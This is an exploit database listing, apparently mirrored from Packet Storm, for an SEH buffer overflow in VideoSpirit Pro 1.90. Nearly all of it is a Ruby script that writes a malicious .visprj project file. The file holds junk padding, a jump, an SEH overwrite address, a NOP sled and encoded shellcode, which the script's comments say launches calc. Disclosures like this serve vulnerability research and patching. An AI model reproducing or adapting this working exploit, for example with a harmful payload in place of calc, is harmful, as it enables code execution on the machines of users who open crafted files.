VideoSpirit Pro 1.90 SEH Buffer Overflow

🗓️ 12 Nov 2013 00:00:00Reported by metacomType
packetstorm🔗 packetstormsecurity.com👁 26 Views
VideoSpirit Pro Buffer Overflow SE
`#!/usr/bin/ruby  
#Vendor: http://www.verytools.com/  
#Software link: http://www.verytools.com/videospirit/download.html  
print '''  
  
VideoSpirit Pro Seh Buffer Overflow  
Version: Pro 1.90  
Date found: 11.11.2013  
Exploit Author: metacom  
Tested on: Win7-Win8-WinXp-Sp3-EN  
'''  
sleep(3)  
head=("\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20"+  
"\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70"+  
"\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20"+  
"\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A"+  
"\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22"+  
"\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65"+  
"\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76"+  
"\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B"+  
"\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B"+  
"\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72"+  
"\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A"+  
"\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79"+  
"\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73"+  
"\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C"+  
"\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30"+  
"\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20"+  
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73"+  
"\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D"+  
"\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20"+  
"\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A"+  
"\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32"+  
"\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C"+  
"\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76"+  
"\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20"+  
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36"+  
"\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B"+  
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20"+  
"\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31"+  
"\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D"+  
"\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22")  
junk="\x41" * 104  
junk+="\xeb\x0c\xff\xff" # jump  
junk+=[0x10113FD3].pack('V')# 10113FD3 5F POP EDI  
junk+="\x90" * 80 # landing zone  
junk+=("\xb8\xb8\xd3\x62\x62\xd9\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"+  
"\x33\x83\xea\xfc\x31\x42\x0e\x03\xfa\xdd\x80\x97\x06\x09\xcd"+  
"\x58\xf6\xca\xae\xd1\x13\xfb\xfc\x86\x50\xae\x30\xcc\x34\x43"+  
"\xba\x80\xac\xd0\xce\x0c\xc3\x51\x64\x6b\xea\x62\x48\xb3\xa0"+  
"\xa1\xca\x4f\xba\xf5\x2c\x71\x75\x08\x2c\xb6\x6b\xe3\x7c\x6f"+ # Calc Shellcode  
"\xe0\x56\x91\x04\xb4\x6a\x90\xca\xb3\xd3\xea\x6f\x03\xa7\x40"+ # Bad Characters  
"\x71\x53\x18\xde\x39\x4b\x12\xb8\x99\x6a\xf7\xda\xe6\x25\x7c"+ # \x00\x0a\x0d\x1a\x21\x22\x26  
"\x28\x9c\xb4\x54\x60\x5d\x87\x98\x2f\x60\x28\x15\x31\xa4\x8e"+  
"\xc6\x44\xde\xed\x7b\x5f\x25\x8c\xa7\xea\xb8\x36\x23\x4c\x19"+  
"\xc7\xe0\x0b\xea\xcb\x4d\x5f\xb4\xcf\x50\x8c\xce\xeb\xd9\x33"+  
"\x01\x7a\x99\x17\x85\x27\x79\x39\x9c\x8d\x2c\x46\xfe\x69\x90"+  
"\xe2\x74\x9b\xc5\x95\xd6\xf1\x18\x17\x6d\xbc\x1b\x27\x6e\xee"+  
"\x73\x16\xe5\x61\x03\xa7\x2c\xc6\xfb\xed\x6d\x6e\x94\xab\xe7"+  
"\x33\xf9\x4b\xd2\x77\x04\xc8\xd7\x07\xf3\xd0\x9d\x02\xbf\x56"+  
"\x4d\x7e\xd0\x32\x71\x2d\xd1\x16\x12\xb0\x41\xfa\xfb\x57\xe2"+  
"\x99\x03")  
junk+="\xCC" * 4500  
footer=("\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65"+  
"\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D"+  
"\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76"+  
"\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20"+  
"\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20"+  
"\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22"+  
"\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32"+  
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20"+  
"\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20"+  
"\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E")  
off= head + junk + footer  
print "\t\t[+]Creating Exploit File...\n"  
sleep(1)  
begin  
File.open("Exploit.visprj","wb") do |f|   
f.write off  
f.close  
print "\t\t[+]File Exploit.visprj create successfully.\n"  
sleep(1)  
end  
rescue  
print "**[-]Error: #{$!}\n"  
exit(0)  
end`
12 Nov 2013 00:00Current
0.8Low risk
Vulners AI Score0.8